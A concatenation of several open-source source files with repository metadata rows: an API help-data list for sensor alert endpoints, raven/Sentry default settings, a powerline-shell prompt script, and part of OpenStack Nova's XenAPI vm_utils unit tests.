'sample_response': [ "RS03ASHS", "GI01SUMO", "CE02SHBP", "CE01ISSM"]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite provided, get list of unique node(s) ' +
'with alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS',
'sample_response': [ "MJ03B" ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}/{node}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite and node provided, get list of unique sensor(s) ' +
'with alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS/MJ03B',
'sample_response': [ "07-TMPSFA301" ]
}]
},
{
'root': 'alertalarms',
'endpoint': 'alertalarms/inv/{subsite}/{node}/{sensor}',
'method': 'GET',
'permission_required': False,
'description': 'For the subsite, node and sensor provided, get list of ' +
'alerts and/or alarms. Optional filter by acknowledgment status.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
},
{'name': 'acknowledged',
'type': 'str',
'description': '[Optional] Enumeration value to filter results ' +
'by acknowledged status. Default is all.',
'valid_values': ['true', 'false', 'all'],
'default': None
}
],
'samples': [{
'sample_request': 'alertalarms/inv/RS03ASHS/MJ03B/07-TMPSFA301?acknowledged=true',
'sample_response': [ {
"severity" : -1,
"method" : None,
"message" : "Stream statuses: failed: 1",
"id" : None,
"type" : "ASSET_STATUS",
"time" : 1.490303941683E12,
"maxMessageLenght" : 4096,
"storeTime" : 1490303955867,
"acknowledgeTime" : 1495783154043,
"acknowledgedBy" : "uframe",
"acknowledged" : True,
"deployment" : None,
"associatedId" : None,
"eventCount" : 1,
"omsEventId" : None,
"omsGroup" : None,
"omsPlatformId" : None,
"omsComponent" : None,
"omsPlatformClass" : None,
"omsFirstTimeTimestamp" : None,
"assetStatus" : "failed",
"node" : "MJ03B",
"subsite" : "RS03ASHS",
"sensor" : "07-TMPSFA301",
"eventId" : 6864312
} ]
}]
}
]
return help_data
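# Illustrative sketch (not part of the service itself): one way a caller might consume the
# list returned above, e.g. to render a quick index of the documented routes. Only keys that
# are populated in help_data ('method', 'endpoint', 'description') are used here.
#
#   for entry in get_help_data_12577():
#       print('%s %s - %s' % (entry['method'], entry['endpoint'], entry['description']))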
| apache-2.0 | 5,930,066,804,793,597,000 | 62.615094 | 124 | 0.252402 | false |
mtrdesign/pylogwatch | pylogwatch/raven/conf/defaults.py | 1 | 2071 | """
raven.conf.defaults
~~~~~~~~~~~~~~~~~~~
Represents the default values for all Sentry settings.
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import os.path
import socket
ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
# Allow local testing of Sentry even if DEBUG is enabled
DEBUG = False
# This should be the full URL to sentries store view
SERVERS = None
TIMEOUT = 5
# TODO: this is specific to Django
CLIENT = 'raven.contrib.django.DjangoClient'
# Not all environments have access to socket module, for example Google App Engine
# Need to check to see if the socket module has ``gethostname``, if it doesn't we
# will set it to None and require it passed in to ``Client`` on initialization.
NAME = socket.gethostname() if hasattr(socket, 'gethostname') else None
# Superuser key -- will be used if set, otherwise defers to
# SECRET_KEY and PUBLIC_KEY
KEY = None
# Credentials to authenticate with the Sentry server
SECRET_KEY = None
PUBLIC_KEY = None
# We allow setting the site name either by explicitly setting it with the
# SENTRY_SITE setting, or using the django.contrib.sites framework for
# fetching the current site. Since we can't reliably query the database
# from this module, the specific logic is within the SiteFilter
SITE = None
# Extending this allow you to ignore module prefixes when we attempt to
# discover which function an error comes from (typically a view)
EXCLUDE_PATHS = []
# By default Sentry only looks at modules in INSTALLED_APPS for drilling down
# where an exception is located
INCLUDE_PATHS = []
# The maximum number of elements to store for a list-like structure.
MAX_LENGTH_LIST = 50
# The maximum length to store of a string-like structure.
MAX_LENGTH_STRING = 400
# Automatically log frame stacks from all ``logging`` messages.
AUTO_LOG_STACKS = False
# Client-side data processors to apply
PROCESSORS = (
'raven.processors.SanitizePasswordsProcessor',
)
# Default Project ID
PROJECT = 1
| gpl-3.0 | -8,137,903,970,246,429,000 | 28.585714 | 82 | 0.750845 | false |
LeonardoGentile/powerline-shell | powerline-shell.old.py | 1 | 15940 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
import sys
def warn(msg):
print '[powerline-bash] ', msg
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg, separator or self.separator,
separator_fg or bg))
def draw(self):
return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset).encode('utf-8')
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0],
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
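# Illustrative sketch (not executed here): the segment snippets appended further below build
# the prompt through this class, roughly as follows (colors are whatever the active theme
# defines, and ``args`` comes from the argparse setup in the __main__ block):
#
#   p = Powerline(args, get_valid_cwd())
#   p.append(' ~ ', Color.CWD_FG, Color.PATH_BG)                 # a path segment
#   p.append(' $ ', Color.CMD_PASSED_FG, Color.CMD_PASSED_BG)    # prompt indicator
#   sys.stdout.write(p.draw())                                   # colored text + separators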
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
try:
cwd = os.getcwd()
except:
cwd = os.getenv('PWD') # This is where the OS thinks we are
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
try:
os.chdir(up)
except:
warn("Your current directory is invalid.")
sys.exit(1)
warn("Your current directory is invalid. Lowest valid directory: " + up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-only', action='store_true',
help='Only show the current directory')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd())
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
import os
def add_virtual_env_segment():
env = os.getenv('VIRTUAL_ENV')
if env is None:
return
env_name = os.path.basename(env)
bg = Color.VIRTUAL_ENV_BG
fg = Color.VIRTUAL_ENV_FG
powerline.append(' %s ' % env_name, fg, bg)
add_virtual_env_segment()
def add_username_segment():
import os
if powerline.args.shell == 'bash':
user_prompt = ' \\u '
elif powerline.args.shell == 'zsh':
user_prompt = ' %n '
else:
user_prompt = ' %s ' % os.getenv('USER')
if os.getenv('USER') == 'root':
bgcolor = Color.USERNAME_ROOT_BG
else:
bgcolor = Color.USERNAME_BG
powerline.append(user_prompt, Color.USERNAME_FG, bgcolor)
add_username_segment()
def add_hostname_segment():
if powerline.args.colorize_hostname:
from lib.color_compliment import stringToHashToColorAndOpposite
from lib.colortrans import rgb2short
from socket import gethostname
hostname = gethostname()
FG, BG = stringToHashToColorAndOpposite(hostname)
FG, BG = (rgb2short(*color) for color in [FG, BG])
host_prompt = ' %s' % hostname.split('.')[0]
powerline.append(host_prompt, FG, BG)
else:
if powerline.args.shell == 'bash':
host_prompt = ' \\h '
elif powerline.args.shell == 'zsh':
host_prompt = ' %m '
else:
import socket
host_prompt = ' %s ' % socket.gethostname().split('.')[0]
powerline.append(host_prompt, Color.HOSTNAME_FG, Color.HOSTNAME_BG)
add_hostname_segment()
import os
def add_ssh_segment():
if os.getenv('SSH_CLIENT'):
powerline.append(' %s ' % powerline.network, Color.SSH_FG, Color.SSH_BG)
add_ssh_segment()
import os
def get_short_path(cwd):
home = os.getenv('HOME')
names = cwd.split(os.sep)
if names[0] == '': names = names[1:]
path = ''
for i in range(len(names)):
path += os.sep + names[i]
if os.path.samefile(path, home):
return ['~'] + names[i+1:]
if not names[0]:
return ['/']
return names
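# Example of the shortening above (assuming HOME=/home/user and that the directories exist,
# since os.path.samefile touches the filesystem):
#   get_short_path('/home/user/projects/demo')  -> ['~', 'projects', 'demo']
#   get_short_path('/etc/nginx')                -> ['etc', 'nginx']
#   get_short_path('/')                         -> ['/']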
def add_cwd_segment():
cwd = powerline.cwd or os.getenv('PWD')
names = get_short_path(cwd.decode('utf-8'))
max_depth = powerline.args.cwd_max_depth
if len(names) > max_depth:
names = names[:2] + [u'\u2026'] + names[2 - max_depth:]
if not powerline.args.cwd_only:
for n in names[:-1]:
if n == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % n, Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % n, Color.PATH_FG, Color.PATH_BG,
powerline.separator_thin, Color.SEPARATOR_FG)
if names[-1] == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % names[-1], Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % names[-1], Color.CWD_FG, Color.PATH_BG)
add_cwd_segment()
import os
def add_read_only_segment():
cwd = powerline.cwd or os.getenv('PWD')
if not os.access(cwd, os.W_OK):
powerline.append(' %s ' % powerline.lock, Color.READONLY_FG, Color.READONLY_BG)
add_read_only_segment()
import re
import subprocess
def get_git_status():
has_pending_commits = True
has_untracked_files = False
origin_position = ""
output = subprocess.Popen(['git', 'status', '--ignore-submodules'],
env={"LANG": "C", "HOME": os.getenv("HOME")}, stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
origin_status = re.findall(
r"Your branch is (ahead|behind).*?(\d+) comm", line)
if origin_status:
origin_position = " %d" % int(origin_status[0][1])
if origin_status[0][0] == 'behind':
origin_position += u'\u21E3'
if origin_status[0][0] == 'ahead':
origin_position += u'\u21E1'
if line.find('nothing to commit') >= 0:
has_pending_commits = False
if line.find('Untracked files') >= 0:
has_untracked_files = True
return has_pending_commits, has_untracked_files, origin_position
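# Hypothetical example of the tuple returned above, for a checkout with pending changes and
# untracked files that is 2 commits ahead of origin:
#   (True, True, u' 2\u21e1')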
def add_git_segment():
# See http://git-blame.blogspot.com/2013/06/checking-current-branch-programatically.html
p = subprocess.Popen(['git', 'symbolic-ref', '-q', 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if 'Not a git repo' in err:
return
if out:
branch = out[len('refs/heads/'):].rstrip()
else:
branch = '(Detached)'
has_pending_commits, has_untracked_files, origin_position = get_git_status()
branch += origin_position
if has_untracked_files:
branch += ' +'
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
if has_pending_commits:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
powerline.append(' %s ' % branch, fg, bg)
try:
add_git_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = subprocess.Popen(['hg', 'status'],
stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
def add_hg_segment():
branch = os.popen('hg branch 2> /dev/null').read().rstrip()
if len(branch) == 0:
return False
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return powerline.append(' %s ' % branch, fg, bg)
add_hg_segment()
import subprocess
def add_svn_segment():
is_svn = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
is_svn_output = is_svn.communicate()[1].strip()
if len(is_svn_output) != 0:
return
#"svn status | grep -c "^[ACDIMRX\\!\\~]"
p1 = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen(['grep', '-c', '^[ACDIMR\\!\\~]'],
stdin=p1.stdout, stdout=subprocess.PIPE)
output = p2.communicate()[0].strip()
if len(output) > 0 and int(output) > 0:
changes = output.strip()
powerline.append(' %s ' % changes, Color.SVN_CHANGES_FG, Color.SVN_CHANGES_BG)
try:
add_svn_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_fossil_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = os.popen('fossil changes 2>/dev/null').read().strip()
has_untracked_files = True if os.popen("fossil extras 2>/dev/null").read().strip() else False
has_missing_files = 'MISSING' in output
has_modified_files = 'EDITED' in output
return has_modified_files, has_untracked_files, has_missing_files
def add_fossil_segment():
subprocess.Popen(['fossil'], stdout=subprocess.PIPE).communicate()[0]
branch = ''.join([i.replace('*','').strip() for i in os.popen("fossil branch 2> /dev/null").read().strip().split("\n") if i.startswith('*')])
if len(branch) == 0:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_fossil_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
powerline.append(' %s ' % branch, fg, bg)
try:
add_fossil_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import re
import subprocess
def add_jobs_segment():
pppid = subprocess.Popen(['ps', '-p', str(os.getppid()), '-oppid='], stdout=subprocess.PIPE).communicate()[0].strip()
output = subprocess.Popen(['ps', '-a', '-o', 'ppid'], stdout=subprocess.PIPE).communicate()[0]
num_jobs = len(re.findall(str(pppid), output)) - 1
if num_jobs > 0:
powerline.append(' %d ' % num_jobs, Color.JOBS_FG, Color.JOBS_BG)
add_jobs_segment()
def add_root_indicator_segment():
root_indicators = {
'bash': ' \\$ ',
'zsh': ' \\$ ',
'bare': ' $ ',
}
bg = Color.CMD_PASSED_BG
fg = Color.CMD_PASSED_FG
if powerline.args.prev_error != 0:
fg = Color.CMD_FAILED_FG
bg = Color.CMD_FAILED_BG
powerline.append(root_indicators[powerline.args.shell], fg, bg)
add_root_indicator_segment()
sys.stdout.write(powerline.draw())
| mit | 5,095,947,534,413,453,000 | 27.876812 | 145 | 0.589649 | false |
sacharya/nova | nova/tests/virt/xenapi/test_vm_utils.py | 1 | 79589 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import uuid
from eventlet import greenthread
import fixtures
import mock
import mox
from oslo.config import cfg
from nova.compute import flavors
from nova.compute import vm_mode
from nova import context
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import processutils
from nova.openstack.common import timeutils
from nova import test
from nova.tests.virt.xenapi import stubs
from nova.tests.virt.xenapi import test_xenapi
from nova import unit
from nova import utils
from nova.virt.xenapi import driver as xenapi_conn
from nova.virt.xenapi import fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
CONF = cfg.CONF
XENSM_TYPE = 'xensm'
ISCSI_TYPE = 'iscsi'
def get_fake_connection_data(sr_type):
fakes = {XENSM_TYPE: {'sr_uuid': 'falseSR',
'name_label': 'fake_storage',
'name_description': 'test purposes',
'server': 'myserver',
'serverpath': '/local/scratch/myname',
'sr_type': 'nfs',
'introduce_sr_keys': ['server',
'serverpath',
'sr_type'],
'vdi_uuid': 'falseVDI'},
ISCSI_TYPE: {'volume_id': 'fake_volume_id',
'target_lun': 1,
'target_iqn': 'fake_iqn:volume-fake_volume_id',
'target_portal': u'localhost:3260',
'target_discovered': False}, }
return fakes[sr_type]
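# For instance (taken straight from the dicts above):
#   get_fake_connection_data(XENSM_TYPE)['sr_uuid'] == 'falseSR'
#   get_fake_connection_data(ISCSI_TYPE)['target_lun'] == 1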
def _get_fake_session_and_exception(error):
session = mock.Mock()
class FakeException(Exception):
details = [error, "a", "b", "c"]
session.XenAPI.Failure = FakeException
session.call_xenapi.side_effect = FakeException
return session
@contextlib.contextmanager
def contextified(result):
yield result
def _fake_noop(*args, **kwargs):
return
class VMUtilsTestBase(stubs.XenAPITestBaseNoDB):
pass
class LookupTestCase(VMUtilsTestBase):
def setUp(self):
super(LookupTestCase, self).setUp()
self.session = self.mox.CreateMockAnything('Fake Session')
self.name_label = 'my_vm'
def _do_mock(self, result):
self.session.call_xenapi(
"VM.get_by_name_label", self.name_label).AndReturn(result)
self.mox.ReplayAll()
def test_normal(self):
self._do_mock(['x'])
result = vm_utils.lookup(self.session, self.name_label)
self.assertEqual('x', result)
def test_no_result(self):
self._do_mock([])
result = vm_utils.lookup(self.session, self.name_label)
self.assertIsNone(result)
def test_too_many(self):
self._do_mock(['a', 'b'])
self.assertRaises(exception.InstanceExists,
vm_utils.lookup,
self.session, self.name_label)
def test_rescue_none(self):
self.session.call_xenapi(
"VM.get_by_name_label", self.name_label + '-rescue').AndReturn([])
self._do_mock(['x'])
result = vm_utils.lookup(self.session, self.name_label,
check_rescue=True)
self.assertEqual('x', result)
def test_rescue_found(self):
self.session.call_xenapi(
"VM.get_by_name_label",
self.name_label + '-rescue').AndReturn(['y'])
self.mox.ReplayAll()
result = vm_utils.lookup(self.session, self.name_label,
check_rescue=True)
self.assertEqual('y', result)
def test_rescue_too_many(self):
self.session.call_xenapi(
"VM.get_by_name_label",
self.name_label + '-rescue').AndReturn(['a', 'b', 'c'])
self.mox.ReplayAll()
self.assertRaises(exception.InstanceExists,
vm_utils.lookup,
self.session, self.name_label,
check_rescue=True)
class GenerateConfigDriveTestCase(VMUtilsTestBase):
def test_no_admin_pass(self):
# This is here to avoid masking errors, it shouldn't be used normally
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.xenapi.vm_utils.destroy_vdi', _fake_noop))
# Mocks
instance = {}
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr('session').AndReturn('sr_ref')
self.mox.StubOutWithMock(vm_utils, 'create_vdi')
vm_utils.create_vdi('session', 'sr_ref', instance, 'config-2',
'configdrive',
64 * unit.Mi).AndReturn('vdi_ref')
self.mox.StubOutWithMock(vm_utils, 'vdi_attached_here')
vm_utils.vdi_attached_here(
'session', 'vdi_ref', read_only=False).AndReturn(
contextified('mounted_dev'))
class FakeInstanceMetadata(object):
def __init__(_self, instance, content=None, extra_md=None,
network_info=None):
self.assertEqual(network_info, "nw_info")
def metadata_for_config_drive(_self):
return []
self.useFixture(fixtures.MonkeyPatch(
'nova.api.metadata.base.InstanceMetadata',
FakeInstanceMetadata))
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('genisoimage', '-o', mox.IgnoreArg(), '-ldots',
'-allow-lowercase', '-allow-multidot', '-l',
'-publisher', mox.IgnoreArg(), '-quiet',
'-J', '-r', '-V', 'config-2', mox.IgnoreArg(),
attempts=1, run_as_root=False).AndReturn(None)
utils.execute('dd', mox.IgnoreArg(), mox.IgnoreArg(),
run_as_root=True).AndReturn(None)
self.mox.StubOutWithMock(vm_utils, 'create_vbd')
vm_utils.create_vbd('session', 'vm_ref', 'vdi_ref', mox.IgnoreArg(),
bootable=False, read_only=True).AndReturn(None)
self.mox.ReplayAll()
# And the actual call we're testing
vm_utils.generate_configdrive('session', instance, 'vm_ref',
'userdevice', "nw_info")
class XenAPIGetUUID(VMUtilsTestBase):
def test_get_this_vm_uuid_new_kernel(self):
self.mox.StubOutWithMock(vm_utils, '_get_sys_hypervisor_uuid')
vm_utils._get_sys_hypervisor_uuid().AndReturn(
'2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f')
self.mox.ReplayAll()
self.assertEqual('2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f',
vm_utils.get_this_vm_uuid(None))
self.mox.VerifyAll()
def test_get_this_vm_uuid_old_kernel_reboot(self):
self.mox.StubOutWithMock(vm_utils, '_get_sys_hypervisor_uuid')
self.mox.StubOutWithMock(utils, 'execute')
vm_utils._get_sys_hypervisor_uuid().AndRaise(
IOError(13, 'Permission denied'))
utils.execute('xenstore-read', 'domid', run_as_root=True).AndReturn(
('27', ''))
utils.execute('xenstore-read', '/local/domain/27/vm',
run_as_root=True).AndReturn(
('/vm/2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f', ''))
self.mox.ReplayAll()
self.assertEqual('2f46f0f5-f14c-ef1b-1fac-9eeca0888a3f',
vm_utils.get_this_vm_uuid(None))
self.mox.VerifyAll()
class FakeSession(object):
def call_xenapi(self, *args):
pass
def call_plugin(self, *args):
pass
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
pass
def call_plugin_serialized_with_retry(self, plugin, fn, num_retries,
callback, *args, **kwargs):
pass
class FetchVhdImageTestCase(VMUtilsTestBase):
def setUp(self):
super(FetchVhdImageTestCase, self).setUp()
self.context = context.get_admin_context()
self.context.auth_token = 'auth_token'
self.session = FakeSession()
self.instance = {"uuid": "uuid"}
self.mox.StubOutWithMock(vm_utils, '_make_uuid_stack')
vm_utils._make_uuid_stack().AndReturn(["uuid_stack"])
self.mox.StubOutWithMock(vm_utils, 'get_sr_path')
vm_utils.get_sr_path(self.session).AndReturn('sr_path')
def _stub_glance_download_vhd(self, raise_exc=None):
self.mox.StubOutWithMock(
self.session, 'call_plugin_serialized_with_retry')
func = self.session.call_plugin_serialized_with_retry(
'glance', 'download_vhd', 0, mox.IgnoreArg(),
extra_headers={'X-Service-Catalog': '[]',
'X-Auth-Token': 'auth_token',
'X-Roles': '',
'X-Tenant-Id': None,
'X-User-Id': None,
'X-Identity-Status': 'Confirmed'},
image_id='image_id',
uuid_stack=["uuid_stack"],
sr_path='sr_path')
if raise_exc:
func.AndRaise(raise_exc)
else:
func.AndReturn({'root': {'uuid': 'vdi'}})
def _stub_bittorrent_download_vhd(self, raise_exc=None):
self.mox.StubOutWithMock(
self.session, 'call_plugin_serialized')
func = self.session.call_plugin_serialized(
'bittorrent', 'download_vhd',
image_id='image_id',
uuid_stack=["uuid_stack"],
sr_path='sr_path',
torrent_download_stall_cutoff=600,
torrent_listen_port_start=6881,
torrent_listen_port_end=6891,
torrent_max_last_accessed=86400,
torrent_max_seeder_processes_per_host=1,
torrent_seed_chance=1.0,
torrent_seed_duration=3600,
torrent_url='http://foo/image_id.torrent'
)
if raise_exc:
func.AndRaise(raise_exc)
else:
func.AndReturn({'root': {'uuid': 'vdi'}})
def test_fetch_vhd_image_works_with_glance(self):
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(
self.context, self.session, self.instance, "vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_fetch_vhd_image_works_with_bittorrent(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(True)
self._stub_bittorrent_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_fetch_vhd_image_cleans_up_vdi_on_fail(self):
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
